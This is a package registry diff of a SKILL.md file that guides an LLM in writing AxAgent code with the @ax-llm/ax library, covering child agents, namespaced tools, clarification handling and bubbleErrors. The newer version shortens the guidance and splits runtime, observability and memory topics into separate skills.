@ax-llm/ax 21.0.6 → 21.0.8

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -1,151 +1,56 @@
1
1
  ---
2
2
  name: ax-agent
3
- description: This skill helps an LLM generate correct AxAgent code using @ax-llm/ax. Use when the user asks about agent(), child agents, namespaced functions, discovery mode, shared fields, llmQuery(...), RLM code execution, recursionOptions, or agent runtime behavior. For tuning and eval with agent.optimize(...), use ax-agent-optimize.
4
- version: "21.0.6"
3
+ description: This skill helps an LLM generate correct core AxAgent code using @ax-llm/ax. Use when the user asks about agent(), child agents, namespaced functions, discovery mode, clarification, bubbleErrors, host-side final/clarification protocol, or ordinary agent runtime behavior. For RLM/code-runtime work use ax-agent-rlm; for callbacks and telemetry use ax-agent-observability; for recall/memory/skill loading use ax-agent-memory-skills; for agent.optimize(...) use ax-agent-optimize.
4
+ version: "21.0.8"
5
5
  ---
6
6
 
7
7
  # AxAgent Codegen Rules (@ax-llm/ax)
8
8
 
9
- Use this skill to generate `AxAgent` code. Prefer short, modern, copyable patterns. Do not write tutorial prose unless the user explicitly asks for explanation.
9
+ Use this skill to generate small, correct `AxAgent` code. Prefer modern factory-style APIs and copyable patterns. Do not write tutorial prose unless the user explicitly asks for explanation.
10
10
 
11
- Your job is not just to write valid code. Your job is to choose the smallest correct `AxAgent` shape for the user's needs:
11
+ Your job is to choose the smallest correct `AxAgent` shape for the user's needs:
12
12
 
13
13
  - If the user wants a normal tool-using assistant, keep the config minimal.
14
- - If the user wants long-running code execution, use RLM features deliberately.
15
- - If the user wants delegated subtasks, decide whether they need plain `llmQuery(...)` or recursive advanced mode.
16
- - If the user wants observability, add only the specific hooks or debug options that support that need.
17
- - If the user is unsure, choose conservative defaults and avoid exotic options.
14
+ - If the user wants long-running code execution, use the `ax-agent-rlm` skill.
15
+ - If the user wants callbacks, logs, tracing, or usage data, use the `ax-agent-observability` skill.
16
+ - If the user wants dynamic memory retrieval or skill-guide loading, use the `ax-agent-memory-skills` skill.
17
+ - If the user wants tuning or eval with `agent.optimize(...)`, use the `ax-agent-optimize` skill.
18
18
 
19
19
  ## Use These Defaults
20
20
 
21
21
  - Use `agent(...)`, not `new AxAgent(...)`.
22
+ - Prefer string signatures or `f()` signatures over hand-written signature objects.
23
+ - Put `ai`, `judgeAI`, and `agentIdentity` on the `agent(...)` config when you want instance defaults or child-agent metadata.
22
24
  - Prefer `fn(...)` for host-side function definitions instead of hand-writing JSON Schema objects.
23
25
  - Prefer namespaced functions such as `utils.search(...)` or `kb.find(...)`.
24
26
  - Pass child agents directly in `functions: [...]`. They land under their `agentIdentity.namespace` (or `utils` if unset), exactly like a `fn()` tool.
25
- - If `functions.discovery` is `true`, discover callables from modules before using them.
26
- - In stdout-mode RLM, use one observable `console.log(...)` step per non-final actor turn.
27
- - Prefer `promptLevel: 'default'` for normal use; use `promptLevel: 'detailed'` when you want extra anti-pattern examples and tighter teaching scaffolding in the actor prompt.
28
- - Default to `contextPolicy: { preset: 'checkpointed', budget: 'balanced' }` for most RLM tasks.
29
- - Prefer `contextPolicy: { preset: 'adaptive', budget: 'balanced' }` when older successful turns should collapse sooner while live runtime state stays visible.
30
- - Prefer `executorModelPolicy` when the actor may need to upgrade after repeated error turns or discovery in specific namespaces without also upgrading the responder.
31
- - Use `executorTurnCallback` when the user needs per-turn observability into generated code, raw runtime result, formatted output, or provider thoughts.
32
- - Use `agentStatusCallback` when the user wants real-time task progress updates from the actor via `await reportSuccess(message)` and `await reportFailure(message)` calls.
33
- - Use `onFunctionCall` when the user wants to observe every function the actor invokes from the JS runtime (their own registered functions plus internal globals like child agents, `discoverModules`, `discoverFunctions`, `consult`).
34
- - Use `onContextEvent` when the caller needs context-pressure and compaction telemetry (`budget_check`, `checkpoint_created`, `checkpoint_cleared`, `tombstone_created`); callback failures are ignored.
27
+ - If discovery is enabled, call `discover(...)` before using callables whose docs are not already in the prompt.
28
+ - Prefer `mode: 'simple'` unless recursive child agents materially improve the task.
29
+ - Add `mode: 'advanced'`, `recursionOptions`, or `maxSubAgentCalls` only when delegated children need their own runtime, tools, or discovery loop.
30
+ - Add `bubbleErrors` only for fatal infrastructure errors that should abort `.forward()`.
35
31
 
36
32
  ## Decision Guide
37
33
 
38
34
  Map user intent to agent shape before writing code:
39
35
 
40
36
  - "Use tools and answer" -> plain `agent(...)` with local functions, no recursion, no extra observability.
41
- - "Inspect large context with code" -> add `runtime`, `contextFields`, and usually `contextPolicy: { preset: 'checkpointed', budget: 'balanced' }`.
42
- - "Delegate focused semantic subtasks" -> use `llmQuery(...)`; add `mode: 'advanced'` only when child tasks need their own runtime, tools, or discovery loop.
43
- - "Need child agents with distinct responsibilities" -> add the child agents to the parent's `functions: [...]` list. Set `agentIdentity.namespace` on each child to control where it lands in the JS runtime (e.g. `team.writer(...)`); otherwise it lands under `utils.<name>` like any other tool.
44
- - "Need tool discovery because names/schemas are not stable" -> use `functions.discovery: true` and generate discovery-first code.
45
- - "Need a stronger actor only when the run gets noisy or large" -> use `executorModelPolicy` and keep the responder model separate.
46
- - "Need debugging or traceability" -> start with `debug: true` or `executorTurnCallback`; do not add both unless the user clearly wants both prompt/runtime visibility and structured telemetry.
47
- - "Need real-time progress updates" -> add `agentStatusCallback` so the actor can call `await reportSuccess(message)` and `await reportFailure(message)` to report sub-task progress.
48
- - "Need to log/trace every tool call" -> add `onFunctionCall` to receive `{ name, qualifiedName, args, kind }` for each function invoked by the runtime; `kind` is `'external'` for caller-registered functions and `'internal'` for agent-injected ones (child agents, discovery, skills loader).
49
- - "Need to observe compaction or prompt pressure" -> add `onContextEvent`; do not scrape actor prompts for pressure metrics.
50
- - "Need certain errors to escape the agent loop" -> add `bubbleErrors` with an array of error classes; those errors propagate through function handlers, actor code, and llmQuery sub-agents all the way to `.forward()`.
51
- - "Need to pull relevant memories into context" -> add `onMemoriesSearch` with a vector/BM25 search callback; the distiller and executor gain `await recall(searches)` (returns void; results land on `inputs.memories` next turn) and an `inputs.memories` field. Add `onUsedMemories` if you want to observe what gets loaded.
52
- - "Need to load skill guides into the executor system prompt on demand" -> add `onSkillsSearch`; the executor gains `await consult(searches)` (returns void; loaded skill bodies render under "Loaded Skills" next turn). Add `onUsedSkills` for observability.
53
-
54
- Choose options based on user needs, not feature completeness:
55
-
56
- - Prefer `mode: 'simple'` unless recursive child agents materially improve the task.
57
- - Prefer `maxSubAgentCalls` only when advanced recursion is enabled or the user needs explicit delegation limits.
58
- - Prefer `contextPolicy: { preset: 'checkpointed', budget: 'balanced' }` by default, switch to `adaptive` when you want earlier summarization, use `full` for debugging, and reserve `lean` for real prompt pressure.
59
-
60
- ## Mental Model
61
-
62
- `AxAgent` is a three-stage pipeline. Each `forward()` call walks (some subset of) the stages in order:
63
-
64
- ```
65
- distiller (RLM actor) → executor (RLM actor) → responder (synthesizer)
66
- ```
67
-
68
- - **distiller** always runs first. It sees all original inputs so it can understand and normalize the task; declared `contextFields` stay runtime-only when present. It distils relevant evidence by writing JS code in a multi-turn loop, then calls `final(request, evidence)`. The request becomes the executor's `inputs.executorRequest`; the distiller should expand the original user task with facts found in context, including follow-ups like "yes, do it". When no `contextFields` are configured, it still performs request normalization over the original inputs with `contextFields: []`. **The distiller has no tools and is not a capability gate** — it only reads, narrows, and forwards. If the user asks for an action (e.g. "run a command"), the distiller forwards it via `final(request, {})`; refusing on the grounds of "no tools" or perceived executor limits is wrong.
69
- - **executor** always runs. It receives non-context inputs plus `inputs.executorRequest` and `inputs.distilledContext` from the distiller's `final(request, evidence)` payload. Raw context fields are not present in the executor stage. The executor owns tool use, decides whether to call its available functions or finish directly from the distilled evidence, and reports actual tool results or failures.
70
- - **responder** always runs last. It synthesizes the user's output signature from whichever upstream actor finished the run and must not contradict tool evidence gathered upstream.
71
-
72
- Treat both actor stages (distiller, executor) as long-running JavaScript REPLs that the actor steers over multiple turns, not as fresh script generators on every turn.
73
-
74
- - Successful code leaves variables, functions, imports, and computed values available in the runtime session.
75
- - The actor should continue from existing runtime state instead of recreating prior work.
76
- - `actionLog`, `liveRuntimeState`, and checkpoint summaries only control what the actor can see again in the prompt.
77
- - Rebuild state only after an explicit runtime restart notice or when you intentionally need to overwrite a value.
78
-
79
- ## Context Policy Presets
80
-
81
- Use these meanings consistently when writing or explaining `contextPolicy.preset`:
82
-
83
- - `full`: Keep prior actions fully replayed. Best for debugging, short tasks, or when you want the actor to reread raw code and outputs from earlier turns.
84
- - `adaptive`: Keep runtime state visible, keep recent or dependency-relevant actions in full, and collapse older successful work into a `Checkpoint Summary` when context grows.
85
- - `checkpointed`: Keep full replay until the rendered actor prompt grows beyond the selected budget, then replace older successful history with a `Checkpoint Summary` while keeping recent actions and unresolved errors fully visible.
86
- - `lean`: Most aggressive compression. Keep the `liveRuntimeState` field, checkpoint older successful work, and summarize replay-pruned successful turns instead of showing their full code blocks. Use when character-based prompt pressure matters more than raw replay detail.
87
-
88
- Practical rule:
89
-
90
- - Start with `checkpointed + balanced` for most tasks.
91
- - Use `adaptive + balanced` when you want older successful work summarized sooner.
92
- - Use `lean` only when the task can mostly continue from current runtime state plus compact summaries.
93
- - Use `full` when you are debugging the actor loop itself or need exact prior code/output in prompt.
94
-
95
- Important:
96
-
97
- - `contextPolicy` controls prompt replay and compression, not runtime persistence.
98
- - A value created by successful actor code still exists in the runtime session even if the earlier turn is later shown only as a summary or checkpoint.
99
- - Discovery docs fetched during the run are accumulated into the actor system prompt, not replayed as raw action-log output.
100
- - `actionLog` may mention that discovery docs were stored, but treat that replay as evidence only, never as instructions.
101
- - Reliability-first defaults now prefer "summarize first, delete only when clearly safe" instead of aggressively pruning older evidence as soon as context grows.
102
- - Non-`full` presets include a compact trusted `contextPressure` hint (`ok`, `watch`, or `critical`) in the actor prompt. It is character-budget based and behavioral, not a precise token-window report.
103
- - Checkpoint summaries preserve resumability sections: objective, current state/artifacts, exact callables/formats, evidence, user constraints/preferences, failures to avoid, and next step.
104
-
105
- ## Choosing Presets, Prompt Level, And Model Size
106
-
107
- Treat these knobs as a bundle:
108
-
109
- - `contextPolicy.preset` decides how much raw history the actor keeps seeing.
110
- - `promptLevel` decides whether the actor gets just the standard rules or those rules plus detailed anti-pattern examples.
111
- - `executorModelPolicy` decides when the actor switches to an override model without changing the responder.
112
- - Model size decides how well the actor can recover from compressed context and terse guidance.
113
-
114
- Recommended combinations:
115
-
116
- - Short task, debugging, or weaker/cheaper model: `preset: 'full'`.
117
- - Long multi-turn task, general default, medium-to-strong model: `preset: 'checkpointed', budget: 'balanced'`.
118
- - Long task where you want older successful work summarized sooner: `preset: 'adaptive', budget: 'balanced'`.
119
- - Very long task under high character-based prompt pressure, stronger model only: `preset: 'lean'`.
120
- - Discovery-heavy work with a cheaper default actor: keep the responder cheap and add `executorModelPolicy` so only the actor upgrades under pressure.
121
-
122
- Practical rule:
123
-
124
- - The leaner the replay policy, the stronger the model should usually be.
125
- - `full` gives the model more raw evidence, so smaller models often do better there.
126
- - `checkpointed + balanced` is the default middle ground for real agent work.
127
- - `adaptive + balanced` is the proactive-summarization variant when you want older successful work compressed sooner.
128
- - `lean` should be reserved for models that can reason well from runtime state plus summaries instead of exact old code/output.
129
- - `executorModelPolicy` is usually better than globally upgrading the whole agent when the bottleneck is actor exploration rather than responder synthesis.
37
+ - "Need child agents with distinct responsibilities" -> add child agents to the parent's `functions: [...]` list and set each child's `agentIdentity.namespace` when you want a specific runtime call site such as `team.writer(...)`.
38
+ - "Need tool discovery because names/schemas are not stable" -> enable discovery and generate discovery-first actor code.
39
+ - "Need certain errors to escape the agent loop" -> add `bubbleErrors` with error classes; those errors propagate through function handlers, actor code, and `llmQuery(...)` sub-agents to `.forward()`.
40
+ - "Inspect large context with code", "RLM", "`llmQuery(...)`", or "recursive delegation" -> use `ax-agent-rlm`.
41
+ - "Need debugging, traces, progress updates, tool-call logs, chat logs, or usage" -> use `ax-agent-observability`.
42
+ - "Need memories, recall, dynamic skill guides, `discover({ skills })`, or loaded/used tracking" -> use `ax-agent-memory-skills`.
130
43
 
131
44
  ## Critical Rules
132
45
 
133
46
  - Use `agent(...)` factory syntax for new code.
134
47
  - Add child agents to the parent's `functions: [...]` list. Each child's `agentIdentity.namespace` (or `utils`, the default) determines the runtime call site, e.g. `await team.writer({...})`.
135
- - If `functions.discovery` is `true`, call `discoverModules(...)` first, then `discoverFunctions(...)`, then call only discovered functions.
136
- - The `Javascript Code` output field uses Ax's normal field-pair response shape, but its value must be executable JavaScript only; do not emit plain `task:` / `evidence:` labels, prose, markdown fences, or `<think>` tags as the value.
137
- - In stdout-mode RLM, non-final turns must emit exactly one `console.log(...)` and stop immediately after it.
138
- - Never combine `console.log(...)` with `await final(...)` or `await askClarification(...)` in the same actor turn.
139
- - Inside actor-authored JavaScript, `await final(...)` and `await askClarification(...)` end the current turn immediately; code after them is dead code.
48
+ - If discovery is enabled, call `discover(...)` before using callables whose docs are not already in the prompt.
140
49
  - If a host-side `AxAgentFunction` needs to end the current actor turn, use `extra.protocol.final(...)` or `extra.protocol.askClarification(...)`.
141
- - If a child agent needs parent inputs such as `audience`, use `fields.shared` or `fields.globallyShared`.
142
- - `llmQuery(...)` failures may come back as `[ERROR] ...`; do not assume success.
143
- - If `contextPolicy.preset` is not `'full'`, rely on the `liveRuntimeState` field for current variables instead of re-reading old action log code.
144
- - If `contextPolicy.preset` is `'adaptive'`, `'checkpointed'`, or `'lean'`, assume older successful turns may be replaced by a `Checkpoint Summary` and that replay-pruned successful turns may appear as compact summaries instead of full code blocks.
145
- - In public `forward()` and `streamingForward()` flows, `askClarification(...)` does not go through the responder; it throws `AxAgentClarificationError`.
50
+ - In public `forward()` and `streamingForward()` flows, `askClarification(...)` throws `AxAgentClarificationError`; it does not go through the responder.
146
51
  - When resuming after clarification, prefer `error.getState()` from the thrown `AxAgentClarificationError`, then call `agent.setState(savedState)` before the next `forward(...)`.
147
- - For offline tuning, hand off to the `ax-agent-optimize` skill and prefer eval-safe tools or in-memory mocks because `agent.optimize(...)` will replay tasks many times.
148
- - Errors listed in `bubbleErrors` bypass all actor-loop catch blocks and propagate directly to the caller of `.forward()`. The same list is automatically inherited by recursive child agents created for advanced-mode `llmQuery(...)` calls.
52
+ - Errors listed in `bubbleErrors` bypass actor-loop catch blocks and propagate directly to the caller of `.forward()`.
53
+ - Child agents receive only the arguments the actor passes. Pass parent fields explicitly via `inputs.<field>` or use `inputUpdateCallback` when many calls need the same value.
149
54
 
150
55
  ## Canonical Pattern
151
56
 
@@ -177,7 +82,7 @@ console.log(result.answer);
177
82
 
178
83
  ## Child Agents As Tools
179
84
 
180
- Child agents are passed in the parent's `functions` list there's no separate `agents` option. Each child agent's `agentIdentity.namespace` (or `utils`, the default) determines where it lands in the JS runtime:
85
+ Child agents are passed in the parent's `functions` list. There is no separate `agents` option for new code. Each child agent's `agentIdentity.namespace` (or `utils`, the default) determines where it lands in the JS runtime:
181
86
 
182
87
  ```typescript
183
88
  const writer = agent('draft:string -> revision:string', {
@@ -209,78 +114,47 @@ const result = await utils.writer({ draft: '...' });
209
114
 
210
115
  Rules:
211
116
 
212
- - Add child agents to `functions: [...]` same array as `fn(...)` tools.
117
+ - Add child agents to `functions: [...]`, the same array as `fn(...)` tools.
213
118
  - Set `agentIdentity.namespace` on the child to control its runtime call site.
214
- - `onFunctionCall` observers receive `kind: 'internal'` for agent-derived calls (vs. `'external'` for user-registered tools).
119
+ - `onFunctionCall` observers receive `kind: 'internal'` for agent-derived calls and `kind: 'external'` for user-registered tools.
215
120
 
216
121
  ### Reserved namespace names
217
122
 
218
- The agent runtime injects a fixed set of globals into the JS REPL. These names cannot be used as `agentIdentity.namespace` values or as agent-function namespaces — the constructor throws `Agent function namespace "<name>" conflicts with an AxAgent runtime global and is reserved`.
123
+ The agent runtime injects a fixed set of globals into the JS REPL. These names cannot be used as `agentIdentity.namespace` values or as agent-function namespaces.
219
124
 
220
- ```
221
- inputs // input field bag
222
- llmQuery // delegated semantic queries
223
- final // turn-end signal
224
- askClarification // request user clarification
225
- reportSuccess // mid-run success ping (when agentStatusCallback set)
226
- reportFailure // mid-run failure ping (when agentStatusCallback set)
227
- inspectRuntime // runtime variable snapshot
228
- discoverModules // module discovery (when functionDiscovery: true)
229
- discoverFunctions // function discovery (when functionDiscovery: true)
230
- consult // skill load (when onSkillsSearch set)
231
- recall // memory load (when onMemoriesSearch set)
125
+ ```text
126
+ inputs
127
+ llmQuery
128
+ final
129
+ askClarification
130
+ reportSuccess
131
+ reportFailure
132
+ inspectRuntime
133
+ discover
134
+ recall
232
135
  ```
233
136
 
234
- Pick any other lowercase identifier (`utils`, `kb`, `tools`, `team`, `db`, etc.) — the runtime accepts arbitrary names as long as they don't collide with this list.
137
+ Pick any other lowercase identifier such as `utils`, `kb`, `tools`, `team`, or `db`.
235
138
 
236
139
  ## Tool Functions And Namespaces
237
140
 
238
141
  ```typescript
239
- import { f, fn } from '@ax-llm/ax';
240
-
241
- const tools = [
242
- fn('findSnippets')
243
- .description('Find handbook snippets by topic')
244
- .namespace('kb')
245
- .arg('topic', f.string('Topic keyword'))
246
- .returns(f.string('Matching snippet').array())
247
- .example({
248
- title: 'Find severity guidance',
249
- code: 'await kb.findSnippets({ topic: "severity" });',
250
- })
251
- .handler(async ({ topic }) => [])
252
- .build(),
253
- ];
254
- ```
255
-
256
- `.arg()` and `.returns()` also accept any [Standard Schema v1](https://standardschema.dev) validator (zod, valibot, arktype) directly — per-argument or a whole `z.object({...})`. The handler's argument type is inferred from the schema:
257
-
258
- ```typescript
259
- import { z } from 'zod';
260
- import { fn } from '@ax-llm/ax';
261
-
262
- const lookupUser = fn('lookupUser')
263
- .description('Fetch a user record by id')
264
- .arg(z.object({
265
- userId: z.string().min(1),
266
- includeProfile: z.boolean().optional(),
267
- }))
268
- .returns(z.object({ name: z.string(), email: z.string().email() }))
269
- .handler(async ({ userId, includeProfile }) => ({ name: 'Ada', email: 'ada@example.com' }))
142
+ import { agent, f, fn } from '@ax-llm/ax';
143
+
144
+ const findSnippets = fn('findSnippets')
145
+ .description('Find handbook snippets by topic')
146
+ .namespace('kb')
147
+ .arg('topic', f.string('Topic keyword'))
148
+ .returns(f.string('Matching snippet').array())
149
+ .example({
150
+ title: 'Find severity guidance',
151
+ code: 'await kb.findSnippets({ topic: "severity" });',
152
+ })
153
+ .handler(async ({ topic }) => [])
270
154
  .build();
271
155
 
272
156
  const analyst = agent('query:string -> answer:string', {
273
- functions: {
274
- local: [
275
- {
276
- namespace: 'kb',
277
- title: 'Knowledge Base',
278
- selectionCriteria: 'Use for handbook and documentation lookups.',
279
- description: 'Handbook and documentation search helpers.',
280
- functions: tools.map(({ namespace: _namespace, ...tool }) => tool),
281
- },
282
- ],
283
- },
157
+ functions: [findSnippets],
284
158
  contextFields: [],
285
159
  });
286
160
  ```
@@ -296,6 +170,44 @@ Rules:
296
170
  - Prefer namespaced functions.
297
171
  - Default function namespace is `utils` when no namespace is set.
298
172
  - Use the runtime call shape `await <namespace>.<name>({...})`.
173
+ - `.arg()` and `.returns()` can use Ax field helpers or any Standard Schema v1 validator directly.
174
+
175
+ ## Grouped Function Modules
176
+
177
+ For discovery mode, group functions into modules using the `AxAgentFunctionGroup` shape when you want a clean namespace tree such as `kb.find(...)` or `metrics.score(...)` without setting `namespace` on every individual `fn(...)`:
178
+
179
+ ```typescript
180
+ const parent = agent('query:string -> answer:string', {
181
+ functions: [
182
+ {
183
+ namespace: 'kb',
184
+ title: 'Knowledge Base',
185
+ selectionCriteria: 'Use for handbook and documentation lookups.',
186
+ description: 'Knowledge base lookups',
187
+ functions: [findSnippetsFn, searchPagesFn],
188
+ },
189
+ {
190
+ namespace: 'workflow',
191
+ title: 'Workflow Controls',
192
+ description: 'Small control functions the actor should always see',
193
+ alwaysInclude: true,
194
+ functions: [completeFn],
195
+ },
196
+ ],
197
+ functionDiscovery: true,
198
+ contextFields: [],
199
+ });
200
+ ```
201
+
202
+ Rules:
203
+
204
+ - A group is `{ namespace, title, description, functions: [...] }`.
205
+ - `selectionCriteria` is optional but useful in discovery mode; it tells the actor when to choose that module.
206
+ - The group's `namespace`, `title`, `selectionCriteria`, and `description` show up in `discover(...)` module docs.
207
+ - Add `alwaysInclude: true` to a group when discovery mode is on but the actor should always see that group's full callable definitions inline in the prompt.
208
+ - Keep `functions: [...]` either flat or grouped. Runtime validation rejects mixed plain function entries and group objects.
209
+ - In flat mode, pass `fn(...)` tools and child agents directly.
210
+ - In grouped mode, put callable entries inside groups. To expose a child agent inside a group, use `childAgent.getFunction()`.
299
211
 
300
212
  ## Host-Side Completion From Functions
301
213
 
@@ -304,38 +216,36 @@ Use this pattern when the actor should call a namespaced function, but the host-
304
216
  ```typescript
305
217
  import { f, fn } from '@ax-llm/ax';
306
218
 
307
- const workflowTools = [
308
- fn('finishReply')
309
- .description('Complete the actor turn with the final reply text')
310
- .namespace('workflow')
311
- .arg('reply', f.string('Final reply text'))
312
- .returns(f.string('Final reply text'))
313
- .handler(async ({ reply }, extra) => {
314
- extra?.protocol?.final(reply);
315
- return reply;
316
- })
317
- .build(),
318
- fn('askForOrderId')
319
- .description('Complete the actor turn by requesting clarification')
320
- .namespace('workflow')
321
- .arg('question', f.string('Clarification question'))
322
- .returns(f.string('Clarification question'))
323
- .handler(async ({ question }, extra) => {
324
- extra?.protocol?.askClarification(question);
325
- return question;
326
- })
327
- .build(),
328
- ];
219
+ const finishReply = fn('finishReply')
220
+ .description('Complete the actor turn with the final reply text')
221
+ .namespace('workflow')
222
+ .arg('reply', f.string('Final reply text'))
223
+ .returns(f.string('Final reply text'))
224
+ .handler(async ({ reply }, extra) => {
225
+ extra?.protocol?.final(reply);
226
+ return reply;
227
+ })
228
+ .build();
229
+
230
+ const askForOrderId = fn('askForOrderId')
231
+ .description('Complete the actor turn by requesting clarification')
232
+ .namespace('workflow')
233
+ .arg('question', f.string('Clarification question'))
234
+ .returns(f.string('Clarification question'))
235
+ .handler(async ({ question }, extra) => {
236
+ extra?.protocol?.askClarification(question);
237
+ return question;
238
+ })
239
+ .build();
329
240
  ```
330
241
 
331
242
  Rules:
332
243
 
333
244
  - `extra.protocol` is only available when the function call comes from an active AxAgent actor runtime session.
334
245
  - Use `extra.protocol.final(...)`, `extra.protocol.askClarification(...)`, or `extra.protocol.guideAgent(...)` only inside host-side function handlers.
335
- - Inside actor-authored JavaScript, keep using the runtime globals `final(...)` and `askClarification(...)`. `final(message)` and `final(task, context)` both go through the same responder-backed completion path; use the one-arg form when no extra context object is needed.
336
- - `extra.protocol.guideAgent(...)` is handler-only internal control flow. It is not exposed as a JS runtime global or public completion type; it stops the current actor turn and appends trusted guidance to `guidanceLog` for the next iteration.
246
+ - Inside actor-authored JavaScript, use the runtime globals `final(...)` and `askClarification(...)`.
247
+ - `extra.protocol.guideAgent(...)` is handler-only internal control flow. It stops the current actor turn and appends trusted guidance to `guidanceLog` for the next iteration.
337
248
  - `askClarification(...)` accepts either a simple string or a structured object with `question` plus optional UI hints such as `type: 'date' | 'number' | 'single_choice' | 'multiple_choice'` and `choices`.
338
- - Do not model these protocol completions as normal registered tool functions or discovery entries.
339
249
 
340
250
  ## Clarification And Resume State
341
251
 
@@ -387,12 +297,12 @@ if (savedState) {
387
297
  Public flow rules:
388
298
 
389
299
  - `forward()` and `streamingForward()` throw `AxAgentClarificationError` when the actor calls `askClarification(...)`.
390
- - Successful `final(...)` completions always continue through the responder in those public flows.
300
+ - Successful `final(...)` completions always continue through the responder in public flows.
391
301
  - `AxAgentClarificationError.question` is the user-facing question text.
392
302
  - `AxAgentClarificationError.clarification` is the normalized structured payload.
393
303
  - `AxAgentClarificationError.getState()` returns the saved continuation state captured at throw time.
394
- - `agent.getState()` and `agent.setState(...)` are the lower-level APIs for explicitly exporting or restoring continuation state on the agent instance.
395
- - `test(...)` is different: it still returns structured completion payloads for harness/debug use instead of throwing clarification exceptions.
304
+ - `agent.getState()` and `agent.setState(...)` export or restore continuation state on the agent instance.
305
+ - `test(...)` is different: it returns structured completion payloads for harness/debug use instead of throwing clarification exceptions.
396
306
 
397
307
  Structured clarification payloads:
398
308
 
@@ -409,35 +319,24 @@ askClarification({
409
319
 
410
320
  - Supported `type` values are `text`, `number`, `date`, `single_choice`, and `multiple_choice`.
411
321
  - `single_choice` payloads with missing, empty, or malformed `choices` are downgraded to a plain clarification question instead of failing the turn.
412
- - `multiple_choice` payloads must include at least two valid choices; otherwise the actor turn fails with a corrective runtime error that tells the model how to fix the call.
322
+ - `multiple_choice` payloads must include at least two valid choices; otherwise the actor turn fails with a corrective runtime error.
413
323
  - Choice entries may be strings or `{ label, value? }` objects.
414
- - Invalid clarification payloads such as a missing `question` are still treated as actor-turn runtime errors, not as successful clarification completions.
415
-
416
- What `AxAgentState` contains:
324
+ - Invalid clarification payloads such as a missing `question` are actor-turn runtime errors, not successful clarification completions.
417
325
 
418
- - `version`: serialized state schema version.
419
- - `runtimeBindings`: the actual restorable JavaScript globals, limited to serializable values.
420
- - `runtimeEntries`: inspect-style metadata for prompt rendering, including summary-only non-restorable values.
421
- - `actionLogEntries`: prior actor turns that should still be replayed after resume.
422
- - `checkpointState`: checkpoint summary text plus the covered turns when checkpointing was active.
423
- - `provenance`: per-binding metadata for the last actor code that set that variable.
424
-
425
- Practical notes:
326
+ State notes:
426
327
 
427
328
  - `runtimeBindings` restores execution state; `runtimeEntries`, `actionLogEntries`, and `checkpointState` restore prompt context.
428
329
  - Resume does not create a fake rehydration action-log turn; provenance still points to the original actor code that set the value.
429
- - When `contextPolicy.preset` is `'adaptive'`, `'checkpointed'`, or `'lean'`, resumed prompts include a `Runtime Restore` notice plus the `liveRuntimeState` field.
430
- - When `contextPolicy.preset` is `'full'`, restore still happens, but the `liveRuntimeState` field is absent from the actor signature.
431
330
  - Only serializable/structured-clone-friendly values are guaranteed to round-trip through `getState()` / `setState(...)`.
432
331
  - Reserved runtime globals such as `inputs`, tools, and protocol helpers are rebuilt fresh and are not part of saved state.
433
332
  - Treat one agent instance as conversation-scoped when using `setState(...)`; do not share one mutable resumed instance across unrelated concurrent conversations.
434
333
 
435
334
  ## Bubble Errors
436
335
 
437
- Use `bubbleErrors` when certain exceptions thrown inside function handlers or llmQuery sub-agent calls should propagate all the way out to the caller of `.forward()` instead of being caught by the actor loop and returned as `[ERROR]` strings.
336
+ Use `bubbleErrors` when certain exceptions thrown inside function handlers or `llmQuery(...)` sub-agent calls should propagate all the way out to `.forward()` instead of being caught by the actor loop and returned as `[ERROR]` strings.
438
337
 
439
338
  ```typescript
440
- import { agent, ai, f, fn } from '@ax-llm/ax';
339
+ import { agent, f, fn } from '@ax-llm/ax';
441
340
 
442
341
  class DatabaseError extends Error {
443
342
  constructor(message: string) {
@@ -446,13 +345,6 @@ class DatabaseError extends Error {
446
345
  }
447
346
  }
448
347
 
449
- class AuthError extends Error {
450
- constructor(message: string) {
451
- super(message);
452
- this.name = 'AuthError';
453
- }
454
- }
455
-
456
348
  const dbTool = fn('queryUsers')
457
349
  .description('Query the user database')
458
350
  .namespace('db')
@@ -467,57 +359,25 @@ const dbTool = fn('queryUsers')
467
359
  const myAgent = agent('query:string -> answer:string', {
468
360
  contextFields: [],
469
361
  functions: [dbTool],
470
- bubbleErrors: [DatabaseError, AuthError],
362
+ bubbleErrors: [DatabaseError],
471
363
  });
472
-
473
- try {
474
- const result = await myAgent.forward(llm, { query: 'find active users' });
475
- console.log(result.answer);
476
- } catch (err) {
477
- if (err instanceof DatabaseError) {
478
- console.error('DB is down:', err.message);
479
- } else if (err instanceof AuthError) {
480
- console.error('Auth failed:', err.message);
481
- } else {
482
- throw err;
483
- }
484
- }
485
364
  ```
486
365
 
487
366
  Rules:
488
367
 
489
- - `bubbleErrors` takes an array of Error constructor classes (checked via `instanceof`).
490
- - A matching error thrown anywhere — inside a function handler, during actor code execution, or inside a nested `llmQuery(...)` child agent propagates immediately to `.forward()`.
368
+ - `bubbleErrors` takes an array of Error constructor classes, checked via `instanceof`.
369
+ - A matching error thrown inside a function handler, during actor code execution, or inside a nested `llmQuery(...)` child agent propagates immediately to `.forward()`.
491
370
  - The same `bubbleErrors` list is automatically propagated to recursive child agents created for advanced-mode `llmQuery(...)` calls.
492
- - Use `bubbleErrors` for fatal infrastructure errors (DB down, auth failures, quota exceeded) that should abort the run entirely rather than let the actor retry.
371
+ - Use `bubbleErrors` for fatal infrastructure errors such as DB down, auth failure, or quota exceeded.
493
372
  - Do not use `bubbleErrors` for expected recoverable errors; let those return as `[ERROR] ...` strings so the actor can handle them.
494
- - `AxAgentClarificationError` and `AxAIServiceAbortedError` always bubble up unconditionally — they do not need to be listed in `bubbleErrors`.
373
+ - `AxAgentClarificationError` and `AxAIServiceAbortedError` always bubble up unconditionally.
495
374
 
496
375
  ## Unified Final Signal
497
376
 
498
377
  There are two ways to end a successful run through the responder:
499
378
 
500
- 1. **In actor JS code**: Call `final(message)` when no extra context object is needed, or `final(task, context)` when you gathered evidence.
501
- 2. **In function handlers**: Use `extra.protocol.final(...)` with the same one-arg or two-arg forms.
502
-
503
- ```typescript
504
- import { agent, ai, f, fn } from '@ax-llm/ax';
505
-
506
- const checkAccess = fn('checkAccess')
507
- .description('Verify access and complete if denied')
508
- .arg('resource', f.string('Resource name'))
509
- .returns(f.string('Access status'))
510
- .handler(async ({ resource }, extra) => {
511
- if (!hasAccess(resource)) {
512
- extra?.protocol?.final(`Access denied for ${resource}`);
513
- }
514
- return 'granted';
515
- })
516
- .build();
517
-
518
- const result = await myAgent.forward(llm, { query });
519
- console.log(result);
520
- ```
379
